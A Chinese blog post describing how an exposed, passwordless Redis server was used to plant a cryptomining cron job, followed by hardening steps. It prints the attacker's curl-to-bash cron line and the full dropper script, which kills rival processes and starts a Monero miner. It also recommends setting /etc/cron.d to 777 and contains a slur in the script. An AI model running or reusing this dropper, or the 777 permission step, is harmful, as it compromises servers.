记一次Redis故障的排查

最新推荐文章于 2024-05-15 11:40:15 发布
最新推荐文章于 2024-05-15 11:40:15 发布
阅读量4.8k 收藏 8
点赞数 4
分类专栏: 运维工作经验笔记 文章标签: redis linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24516549/article/details/84636564
版权

背景:

最近在公司dev服务器上搭建的redis总会出现异常,需要重启才能正常工作,严重影响开发效率,试图排查解决该问题

步骤:

查看redis配置文件:

查看/etc/redis.conf文件

loglevel notice
logfile /var/log/redis/redis.log

查看日志文件:

查看 /var/log/redis/redis.log文件
发现重启前一直出现错误报告

22661:C 29 Nov 16:25:43.078 # Failed opening the RDB file root (in server root dir /etc/cron.d) for saving: Permission denied

推测是rdb设置权限错误导致该问题…

修改对应权限:

查看对应权限
/etc/cron.d 目录权限为xxx,修改为777
该目录用于redis启动AOF持久化定时命令,写入失败导致redis异常

问题解决

事后发现 /etc/cron.d 目录下果然多了一个redis生成的root文件,之前是因为无法写入导致redis异常

后续:

神转折,后来看了下写入的是什么文件,发现redis中多了一个键,内容是

*/5 * * * * curl -fsSLk https://pixeldra.in/api/download/nbf6QU | bash

到该网址发现下载了一个文件

#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
getnanoWatch(){
    ARCH=$(uname -i)
    if [ "$ARCH" == "x86_64" ]
    then
        rm -rf /tmp/nanoWatch*
        wget https://pixeldra.in/api/download/BsjL1_ --no-check-certificate -O /tmp/nanoWatch
            if [ $? -ne 0 -a $PS2 -eq 0 ];
            then
            curl -sk https://pixeldra.in/api/download/BsjL1_ -o /tmp/nanoWatch
            fi
    elif [ "$ARCH" == "i386" ]
    then
        rm -rf /tmp/nanoWatch*
        wget https://pixeldra.in/api/download/BsjL1_ --no-check-certificate -O /tmp/nanoWatch
            if [ $? -ne 0 -a $PS2 -eq 0 ];
            then
            curl -sk https://pixeldra.in/api/download/BsjL1_ -o /tmp/nanoWatch
            fi
    else
        rm -rf /tmp/nanoWatch*
        wget https://pixeldra.in/api/download/BsjL1_ --no-check-certificate -O /tmp/nanoWatch
            if [ $? -ne 0 -a $PS2 -eq 0 ];
            then
            curl -sk https://pixeldra.in/api/download/BsjL1_ -o /tmp/nanoWatch
            fi
    fi
}

killNiggiz(){
    ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep udevd | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep docker | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep hashvault | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep moneroocean | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep evolutions | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep littletrump | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep jboss | grep -v grep | awk '{print $2}' | xargs kill -9
    skill -KILL crypto-pool
    skill -KILL nanopool
    skill -KILL supportxmr
    skill -KILL minexmr
    skill -KILL dwarfpool
    skill -KILL xmrpool
    skill -KILL moneropool
    skill -KILL xmr
    skill -KILL monero
    skill -KILL udevs
    skill -KILL udevd
    skill -KILL docker
    skill -KILL hashvault
    skill -KILL moneroocean
    skill -KILL evolutions
    skill -KILL littletrump
    skill -KILL jboss
}

killNiggiz

PS2=$(ps aux | grep nanoWatch | grep -v "grep" | wc -l)
if [ $PS2 -eq 0 ];
then
    getnanoWatch
fi
chmod +x /tmp/nanoWatch
chmod 777 /tmp/nanoWatch
if [ $PS2 -eq 0 ];
then
/tmp/nanoWatch -o pool.t00ls.ru:19000 -k -B
fi

特么被通过redis写进了一个挖矿脚本…
命名也十分搞笑,总之得知问题之后重装了系统,惨痛的代价
其实还是安全性的问题,之前的redis方便起见所有ip都可以访问,端口是默认的6379,密码为空,导致黑客完全可以写个脚本扫描所有ip的6379端口空密码试图连接这种毫无安全意识的服务器,并向redis中写入一些脚本文件…然后就是为所欲为了
吸取这次教训修改了redis的默认端口及密码
在redis.conf下加入如下内容禁止高风险命令的执行

rename-command config ""
rename-command flushall ""
rename-command flushdb ""
rename-command shutdown ""
rename-command eval ""
暮色恍然
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次关于Redis内存诡异增长的排查过程实战
09-09
在本文中,我们将深入探讨一次关于Redis内存异常增长的排查过程。这通常是一个棘手的问题,因为内存管理是Redis性能的关键因素。通过这次实战录,我们可以了解到如何分析和解决此类问题。 首先,我们关注到的现象...
Redis偶发连接失败案例实战
09-09
Redis偶发连接失败案例实战录】 在使用Redis过程中,偶发性的连接失败是一个常见的问题,这可能由...通过细致的故障排查,结合对服务器和客户端的性能监控,以及适当的配置优化,可以有效地预防和解决此类问题。
redis 故障演练
weixin_40074744的博客
07-08 800
Redis是Remote Dictionary Server的缩写。本质上一个Key/Value数据库,与Memcached类似的NoSQL型数据库,但是数据可以持久化的...
Redis故障排查】「连接失败问题排查和解决」带你深入分析一下Redis阻塞原因以及问题排查方案指南
世界上并没有完美的程序,但是我们并不因此而沮丧,因为写程序就是一个不断追求完美的过程。
07-08 3227
Redis的一个配置项,用于设置慢查询日志的阈值。它表示执行时间超过该阈值的命令会被录到慢查询日志中。在您提供的示例中,被配置为10000,单位是微秒(μs),即10毫秒。这意味着当一个命令的执行时间超过10毫秒时,它将被Redis录到慢查询日志中。是Redis的另一个配置项,表示慢查询日志的最大长度。它决定了慢查询日志中可以保存的录数量。在您提供的示例中,被配置为128,即最多保存128条慢查询日志录。当慢查询日志中的录达到最大长度后,新的慢查询会替换掉最旧的录。
云服务器上Redis数据库被攻击实录+总结
最新发布
青衫客36的博客
05-15 921
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
线上故障排查
xiangbole的博客
05-31 274
前言 线上定位问题时,主要靠监控和日志。一旦超出监控的范围,则排查思路很重要,按照流程化的思路来定位问题,能够让我们在定位问题时从容、淡定,快速的定位到线上的问题。 线上问题定位思维导图 一 服务器层面 1.1 磁盘 1.1.1 问题现象 当磁盘容量不足的时候,应用时常会抛出如下的异常信息: java.io.IOException: 磁盘空间不足 或是类似如下告警信息: 1.1.2 排查思路 1.1.2.1 利用 df 查询磁盘状态 利用以下指令获取磁盘状态: df -h 结果是: 可知
一次Redis的异常分析
张兆坤
12-12 9239
最近线上环境偶尔在零点过后的时候就会报Redis的异常,出现好几种错误,并且持续时间在1-3分钟之间,并不固定,报的错误也有3种,表现各不相同,很是诡异。
线上故障如何快速排查?来看这套技巧大全
有才而性缓,定属大才。有智而气和,斯为大智。
04-25 740
有哪些常见的线上故障?如何快速定位问题?本文详细总结工作中的经验,从服务器、Java应用、数据库、Redis、网络和业务六个层面分享线上故障排查的思路和技巧。较长,同学们可收藏后再看。 前言 线上定位问题时,主要靠监控和日志。一旦超出监控的范围,则排查思路很重要,按照流程化的思路来定位问题,能够让我们在定位问题时从容、淡定,快速的定位到线上的问题。 线上问题定位思维导图 一 服务器层面 1.1 磁盘 1.1.1 问题现象 当磁盘容量不足...
Redis性能问题排查解决手册.rar
09-16
但要注意,事务中的命令会一次性执行,可能导致CPU短时飙升。 4. 分区策略:通过主从复制或Cluster实现数据分布式存储,负载均衡,提升整体性能。但需注意,分区会导致更多的网络通信,需合理设计分区策略。 5. ...
redis在win上的运行脚本redis.bat
08-04
此外,了解如何通过`redis-cli`或`redis.bat`进行故障排查和日志分析也是运维Redis的重要技能。 总之,Redis在Windows上的运行涉及到下载合适的二进制文件、配置`redis.windows.conf`、使用`redis.bat`脚本启动服务...
redis7.0的tar.gz压缩包
07-26
7. **集群改进**:Redis集群的稳定性得到增强,包括故障检测和恢复机制的优化,以及更好的数据迁移策略,确保服务的高可用性。 8. **持久化优化**:AOF(Append Only File)持久化方式在7.0中得到了优化,减少了...
一次线上 Jedis(Redis 客户端)异常的排查、定位、分析、解决!
izipfnybwr的博客
02-15 754
本文导读: 应用异常监控 Redis客户端异常分析 Redis客户端问题引导分析 站在Redis客户端视角分析 站在Redis服务端视角分析 资源池生产配置合理性分析 本文总结 今天我们来聊聊线上环境遇到的一个问题以及分析过程。 1.应用异常监控 这不,项目中有一个Redis客户端的异常在疫情期间,出现在了你的面前,虽然该异常是偶发,有必要仔细分析下该异常出现的原由。 具体异常信息如下所示: 大家看截图展示的异常信息,是不
redis性能优化——生产中实际遇到的问题排查总结
热门推荐
crisis_hiding的博客
08-12 2万+
背景 redis-K,V数据库,因其高性能的操作性和支持丰富的数据结构,目前大量被用于衔接应用层和关系数据库中间的缓存层。随着使用的场景越来越多,和数据量快速的递增,在生产环境中经常会遇到相关的性能瓶颈问题。这时候就需要借助一些外部的手段来分析瓶颈根源在哪,对症下药提升性能。 常见性能问题及问题分析过程 1、生产系统刚开始运行阶段,系统稳定。但是运行一段时间后,发现部分时间段系统...
Redis 超时排查
weixin_34348174的博客
12-10 217
突然收到告警,提示redis挂了,同时大群也在说某某redis连接超时了,过了一会儿就恢复了。这时登上服务器,查看监控。首先看看qps: 可以看到qps并不高,但是中间有段时间没取到数据是怎么回事?那么继续看看redis的cpu使用率: 可以看到cpu已经饱和,这也就能解释为何断图了,因为redis是单线程,在使用cpu 100%以后,就无法处理其他的命令了,zabbix也就无法执行i...
一次Docker中Redis连接暴增的问题排查
keocce的博客
06-08 544
周六生产服务器出现redis服务器不可用状态,错误信息为: 状态不可用,等待后台检查程序恢复方可使用。Unexpected end of stream; expected type 'Status' 如下图所示,下图6300就是我们redis服务器运行的端口。 头一次碰到此类问题,心想难道是redis挂掉了,随即通过telnet ip+端口。发现运行正常,然后就想着进入redis看下目前连接情况。一看发现竟然高达1903条这么多。 然后想着应该是代码创建redis连接过多导致的,查看代码。...
故障分析| Redis 故障诊断及常用运维命令—内存篇
ActionTech的博客
04-16 374
作者:任仲禹 爱可生 DBA 团队成员,擅长故障分析和性能优化,文章相关技术问题,欢迎大家一起讨论。 本文来源:原创投稿 *爱可生开源社区出品,原创内容未经授权不得随意使用,转载请联系小编并注明来源。 本文目录: 背景 Redis 内存消耗划分 内存 OOM 会导致哪些问题? 排查思路 是否数据量太大? 是否客户端输入缓冲区有问题? 是否复制积压缓冲区有问题? 是否客户端输出缓冲区有问题? 实用命令 模拟 Redis 压力相关命令 常⽤ Redis 内存排查命.
Redis错误之:打开RDB文件保存失败
qq_45065241的博客
10-20 1万+
问题描述 最近在windows系统下进行开发,所以用到的redis也是windows版本的。因为解压之后便直接使用了,并没有修改redis相关配置。导致redis跑了一段时间过后就会报下面的错误。 错误信息 # Background saving error [12784] 20 Oct 10:52:32.091 * 100 changes in 300 seconds. Saving... [12784] 20 Oct 10:52:32.136 * Background saving starte
redis集群故障处理
02-22
Redis集群故障处理是指在Redis分布式集群中,当出现故障或异常情况时,需要采取相应的措施来恢复正常运行。以下是一些常见的Redis集群故障处理方法: 1. 主节点故障:当Redis主节点发生故障时,需要进行主从切换。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值